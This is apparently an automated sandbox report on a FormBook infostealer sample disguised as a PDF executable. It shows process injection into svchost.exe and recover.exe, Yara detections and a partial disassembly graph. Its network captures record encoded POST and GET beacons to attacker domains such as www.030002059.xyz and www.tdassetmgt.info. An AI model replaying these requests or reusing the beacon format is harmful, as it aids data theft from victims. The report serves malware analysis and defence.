                                                                        Dec 13, 2024 13:10:19.888567924 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        41192.168.2.450044161.97.142.14480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:22.133514881 CET10872OUTPOST /er88/ HTTP/1.1
                                                                        Host: www.030002059.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.030002059.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.030002059.xyz/er88/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 76 36 51 38 63 66 4e 74 47 73 74 56 67 41 67 63 54 50 57 6e 65 50 46 43 78 4f 46 49 66 59 31 77 2b 51 43 5a 6d 79 48 49 35 5a 64 51 36 41 67 48 38 53 30 41 63 39 75 78 33 4b 77 6b 65 6e 63 7a 44 44 70 75 36 6a 48 45 55 57 4e 6f 6b 6a 47 31 70 79 6d 41 63 30 68 6c 6c 66 58 5a 62 79 51 51 49 32 38 4f 77 76 42 61 6e 77 6f 47 34 4e 35 58 38 38 74 7a 66 51 58 53 62 33 6c 62 62 4d 45 67 48 46 47 31 76 78 6c 4d 68 73 30 6b 74 43 77 30 35 47 49 61 7a 64 44 52 30 68 37 57 51 33 76 52 7a 53 64 57 4f 58 77 61 30 6f 7a 4c 6e 4b 59 45 43 47 6c 43 6a 6d 64 57 34 74 4d 49 47 74 52 30 65 53 72 74 57 76 79 71 37 6a 75 62 4d 7a 7a 32 61 52 59 42 46 4c 78 30 4d 34 68 69 61 63 38 6b 56 47 64 46 38 7a 4f 42 57 73 4c 36 37 36 41 2f 73 7a 59 41 6d 37 58 62 5a 4c 43 53 6b 4d 4a 52 63 62 66 48 56 66 33 34 72 53 35 31 59 7a 4d 32 4e 74 41 64 65 74 36 55 77 6e 42 37 39 4a 70 78 41 73 33 39 32 52 62 71 64 49 75 75 69 55 53 49 34 71 51 35 6e 57 6f 64 37 4b 55 55 6d 58 4c 41 46 6e 4f 6b 4d 6c 45 6f 70 62 4d [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=v6Q8cfNtGstVgAgcTPWnePFCxOFIfY1w+QCZmyHI5ZdQ6AgH8S0Ac9ux3KwkenczDDpu6jHEUWNokjG1pymAc0hllfXZbyQQI28OwvBanwoG4N5X88tzfQXSb3lbbMEgHFG1vxlMhs0ktCw05GIazdDR0h7WQ3vRzSdWOXwa0ozLnKYECGlCjmdW4tMIGtR0eSrtWvyq7jubMzz2aRYBFLx0M4hiac8kVGdF8zOBWsL676A/szYAm7XbZLCSkMJRcbfHVf34rS51YzM2NtAdet6UwnB79JpxAs392RbqdIuuiUSI4qQ5nWod7KUUmXLAFnOkMlEopbMK/Akv+kHHKhUsEtD7tKUftfGpAcoVON1xa/EOr9aJqFr+fdRmCJ1ns8lv9WzGhrG5/3eu4c6LwSaCOJipDSS/iaSLf5CMZ+/KPTnN/+XBWZbl0v+InD7UkC+UaAvJk+XLsnRWJWD12WEwjgHvIqj1EnzUPpeyOLc5619F+U3YlS17CfD9jsQmD047PKRSxXuvRcFzitgvcdQGlIPfC5ZtDuZAkn0zb0Kg+IQxtgUmeaTcPVk65MVFsYDf5idB2unBVoPiEcaa4BQZtVLwvE90sErW2/ab0LWAd7fjtmpoilrzPOpYGPrhgHu+HE5DbNlC010bBrh9fzJ00cvKp4ZcNkTguwNrLr0YHWQUuuGxNG9TKPpfSQ4Cc7mXJqy71DyR3P76b+R2sOiLqbT3jMTTzcyoO8kdW8TyjJyo3MPbazXIXC32jp4DYs2SEG0n/AqTichFXcl49bulFhE98kIsy56CJZJQgEwE2j+Yz7KHvYFm94CQNtxm1BCgAdQf5eNgmZ7Gviq3NCoczRYEadGlIf2pES+kr0hlMzmnGRH7/LBtabj6HfURaLuO99rnwLRkuvB2pSlH/yWvm48n97z+we9t7WOSAU0U/o2jRokhi9WO8vk/tVFa7cAvMoyB/FJbzL8y+7W9mPoHOcgg8lUBz72Xha5467+2x [TRUNCATED]
                                                                        Dec 13, 2024 13:10:23.366647959 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:10:23 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Dec 13, 2024 13:10:23.366672993 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        42192.168.2.450045161.97.142.14480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:24.790267944 CET512OUTGET /er88/?9B_ppt=i44cfvhGA8d2n3UYXaCGfuZ18OIgEphd3DXa+grkxbY00W8PtxsyWNCcnvl5XmwHEQha9wDhby9/6Haw/gmAEUgIq47tXTEuO1ZaxpFdonJQgsoz6uRXQGU=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.030002059.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:10:26.132560968 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:10:25 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 2966
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: "66cce1df-b96"
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                        Dec 13, 2024 13:10:26.132584095 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                        Dec 13, 2024 13:10:26.132594109 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        43192.168.2.4500503.33.130.19080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:47.026427984 CET776OUTPOST /d55l/ HTTP/1.1
                                                                        Host: www.tdassetmgt.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tdassetmgt.info
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.tdassetmgt.info/d55l/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 4d 69 67 47 79 79 58 59 68 73 62 68 64 53 4c 4b 49 59 77 74 54 67 56 37 75 46 4f 76 47 70 41 2b 48 78 58 65 2b 52 34 66 4a 6d 61 73 78 49 4e 4f 74 55 58 73 61 72 4e 56 78 47 52 66 38 4f 6a 71 72 31 78 4b 38 55 66 32 44 63 59 54 75 45 4c 68 65 4d 4b 58 61 66 75 45 74 45 36 6e 37 65 46 48 2b 6f 5a 79 65 50 45 37 47 67 6c 75 4f 33 6b 63 71 36 6b 44 78 37 72 6c 6e 6e 53 58 34 63 38 75 41 30 4f 57 49 39 6f 6b 48 52 72 2f 44 61 44 4b 6f 51 61 61 48 51 64 42 44 6c 46 42 45 33 56 51 51 56 63 56 75 64 4d 4c 59 73 6c 34 4c 71 2b 71 69 37 59 79 79 38 56 6f 53 57 61 61 2f 2b 58 59 32 67 3d 3d
                                                                        Data Ascii: 9B_ppt=MigGyyXYhsbhdSLKIYwtTgV7uFOvGpA+HxXe+R4fJmasxINOtUXsarNVxGRf8Ojqr1xK8Uf2DcYTuELheMKXafuEtE6n7eFH+oZyePE7GgluO3kcq6kDx7rlnnSX4c8uA0OWI9okHRr/DaDKoQaaHQdBDlFBE3VQQVcVudMLYsl4Lq+qi7Yyy8VoSWaa/+XY2g==
                                                                        Dec 13, 2024 13:10:48.112895966 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        44192.168.2.4500513.33.130.19080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:10:49.679757118 CET796OUTPOST /d55l/ HTTP/1.1
                                                                        Host: www.tdassetmgt.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tdassetmgt.info
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.tdassetmgt.info/d55l/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 4d 69 67 47 79 79 58 59 68 73 62 68 63 79 62 4b 4e 35 77 74 53 41 56 30 68 6c 4f 76 49 35 41 69 48 78 62 65 2b 51 4d 50 56 45 2b 73 2f 4d 4a 4f 73 52 72 73 58 4c 4e 56 70 32 52 65 79 75 6a 62 72 31 73 2f 38 52 66 32 44 64 34 54 75 42 33 68 66 37 57 55 62 50 75 43 30 55 36 6c 30 2b 46 48 2b 6f 5a 79 65 50 52 7a 47 6d 4e 75 4f 45 38 63 6c 34 41 63 79 37 72 6b 76 48 53 58 38 63 39 70 41 30 50 44 49 34 77 65 48 54 6a 2f 44 59 62 4b 72 42 61 56 4e 51 64 48 4f 46 45 58 4b 43 4d 79 59 45 78 43 6b 72 41 6c 56 59 74 46 44 4d 7a 77 7a 4b 35 6c 67 38 78 62 50 52 54 75 79 39 71 52 74 6c 77 58 4d 64 52 5a 64 74 61 77 54 63 7a 41 6a 74 52 70 58 68 38 3d
                                                                        Data Ascii: 9B_ppt=MigGyyXYhsbhcybKN5wtSAV0hlOvI5AiHxbe+QMPVE+s/MJOsRrsXLNVp2Reyujbr1s/8Rf2Dd4TuB3hf7WUbPuC0U6l0+FH+oZyePRzGmNuOE8cl4Acy7rkvHSX8c9pA0PDI4weHTj/DYbKrBaVNQdHOFEXKCMyYExCkrAlVYtFDMzwzK5lg8xbPRTuy9qRtlwXMdRZdtawTczAjtRpXh8=
                                                                        Dec 13, 2024 13:10:50.763427973 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:07:06:13
                                                                        Start date:13/12/2024
                                                                        Path:C:\Users\user\Desktop\SC_TR11670000_pdf.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                                                                        Imagebase:0xae0000
                                                                        File size:1'179'136 bytes
                                                                        MD5 hash:1EAD28DAD1FAE4A2478C61D096A3F162
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:07:06:15
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SC_TR11670000_pdf.exe"
                                                                        Imagebase:0x580000
                                                                        File size:46'504 bytes
                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1923090053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1924622437.0000000005730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1924200724.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:07:06:24
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe"
                                                                        Imagebase:0xfb0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4204999427.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:3
                                                                        Start time:07:06:26
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\recover.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\recover.exe"
                                                                        Imagebase:0x7f0000
                                                                        File size:12'288 bytes
                                                                        MD5 hash:D38B657A068016768CA9F3B5E100B472
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4204068794.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4205129970.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4205169396.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:7
                                                                        Start time:07:06:39
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe"
                                                                        Imagebase:0xfb0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4206800241.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:8
                                                                        Start time:07:06:51
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff6bf500000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:4.1%
                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                          Signature Coverage:2.6%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:174
                                                                          execution_graph 97888 b07e93 97889 b07e9f __close 97888->97889 97925 b0a048 GetStartupInfoW 97889->97925 97891 b07ea4 97927 b08dbc GetProcessHeap 97891->97927 97893 b07efc 97894 b07f07 97893->97894 98010 b07fe3 58 API calls 3 library calls 97893->98010 97928 b09d26 97894->97928 97897 b07f0d 97898 b07f18 __RTC_Initialize 97897->97898 98011 b07fe3 58 API calls 3 library calls 97897->98011 97949 b0d812 97898->97949 97901 b07f27 97902 b07f33 GetCommandLineW 97901->97902 98012 b07fe3 58 API calls 3 library calls 97901->98012 97968 b15173 GetEnvironmentStringsW 97902->97968 97905 b07f32 97905->97902 97908 b07f4d 97909 b07f58 97908->97909 98013 b032f5 58 API calls 3 library calls 97908->98013 97978 b14fa8 97909->97978 97912 b07f5e 97913 b07f69 97912->97913 98014 b032f5 58 API calls 3 library calls 97912->98014 97992 b0332f 97913->97992 97916 b07f71 97917 b07f7c __wwincmdln 97916->97917 98015 b032f5 58 API calls 3 library calls 97916->98015 97998 ae492e 97917->97998 97920 b07f90 97921 b07f9f 97920->97921 98016 b03598 58 API calls _doexit 97920->98016 98017 b03320 58 API calls _doexit 97921->98017 97924 b07fa4 __close 97926 b0a05e 97925->97926 97926->97891 97927->97893 98018 b033c7 36 API calls 2 library calls 97928->98018 97930 b09d2b 98019 b09f7c InitializeCriticalSectionAndSpinCount __getstream 97930->98019 97932 b09d30 97933 b09d34 97932->97933 98021 b09fca TlsAlloc 97932->98021 98020 b09d9c 61 API calls 2 library calls 97933->98020 97936 b09d39 97936->97897 97937 b09d46 97937->97933 97938 b09d51 97937->97938 98022 b08a15 97938->98022 97941 b09d93 98030 b09d9c 61 API calls 2 library calls 97941->98030 97944 b09d72 97944->97941 97946 b09d78 97944->97946 97945 b09d98 97945->97897 98029 b09c73 58 API calls 4 library calls 97946->98029 97948 b09d80 GetCurrentThreadId 97948->97897 97950 b0d81e __close 97949->97950 98042 b09e4b 97950->98042 97952 b0d825 97953 b08a15 __calloc_crt 58 API calls 97952->97953 97954 b0d836 97953->97954 97955 b0d8a1 GetStartupInfoW 97954->97955 97956 b0d841 __close @_EH4_CallFilterFunc@8 97954->97956 97962 b0d8b6 97955->97962 97963 b0d9e5 97955->97963 97956->97901 97957 b0daad 98051 b0dabd LeaveCriticalSection _doexit 97957->98051 97959 b08a15 __calloc_crt 58 API calls 97959->97962 97960 b0da32 GetStdHandle 97960->97963 97961 b0da45 GetFileType 97961->97963 97962->97959 97962->97963 97964 b0d904 97962->97964 97963->97957 97963->97960 97963->97961 98050 b0a06b InitializeCriticalSectionAndSpinCount 97963->98050 97964->97963 97965 b0d938 GetFileType 97964->97965 98049 b0a06b InitializeCriticalSectionAndSpinCount 97964->98049 97965->97964 97969 b07f43 97968->97969 97970 b15184 97968->97970 97974 b14d6b GetModuleFileNameW 97969->97974 98091 b08a5d 58 API calls __malloc_crt 97970->98091 97972 b151aa _memmove 97973 b151c0 FreeEnvironmentStringsW 97972->97973 97973->97969 97976 b14d9f _wparse_cmdline 97974->97976 97975 b14ddf _wparse_cmdline 97975->97908 97976->97975 98092 b08a5d 58 API calls __malloc_crt 97976->98092 97979 b14fc1 __wsetenvp 97978->97979 97983 b14fb9 97978->97983 97980 b08a15 __calloc_crt 58 API calls 97979->97980 97988 b14fea __wsetenvp 97980->97988 97981 b15041 97982 b02f95 _free 58 API calls 97981->97982 97982->97983 97983->97912 97984 b08a15 __calloc_crt 58 API calls 97984->97988 97985 b15066 97986 b02f95 _free 58 API calls 97985->97986 97986->97983 97988->97981 97988->97983 97988->97984 97988->97985 97989 b1507d 97988->97989 98093 b14857 58 API calls __close 97988->98093 98094 b09006 IsProcessorFeaturePresent 97989->98094 97991 b15089 97991->97912 97993 b0333b __IsNonwritableInCurrentImage 97992->97993 98117 b0a711 97993->98117 97995 b03359 __initterm_e 97997 b03378 __cinit __IsNonwritableInCurrentImage 97995->97997 98120 b02f80 97995->98120 97997->97916 97999 ae49e7 97998->97999 98000 ae4948 97998->98000 97999->97920 98001 ae4982 IsThemeActive 98000->98001 98155 b035ac 98001->98155 98005 ae49ae 98167 ae4a5b SystemParametersInfoW SystemParametersInfoW 98005->98167 98007 ae49ba 98168 ae3b4c 98007->98168 98009 ae49c2 SystemParametersInfoW 98009->97999 98010->97894 98011->97898 98012->97905 98016->97921 98017->97924 98018->97930 98019->97932 98020->97936 98021->97937 98024 b08a1c 98022->98024 98025 b08a57 98024->98025 98026 b08a3a 98024->98026 98031 b15446 98024->98031 98025->97941 98028 b0a026 TlsSetValue 98025->98028 98026->98024 98026->98025 98039 b0a372 Sleep 98026->98039 98028->97944 98029->97948 98030->97945 98032 b15451 98031->98032 98036 b1546c 98031->98036 98033 b1545d 98032->98033 98032->98036 98040 b08d68 58 API calls __getptd_noexit 98033->98040 98034 b1547c RtlAllocateHeap 98034->98036 98037 b15462 98034->98037 98036->98034 98036->98037 98041 b035e1 DecodePointer 98036->98041 98037->98024 98039->98026 98040->98037 98041->98036 98043 b09e5c 98042->98043 98044 b09e6f EnterCriticalSection 98042->98044 98052 b09ed3 98043->98052 98044->97952 98046 b09e62 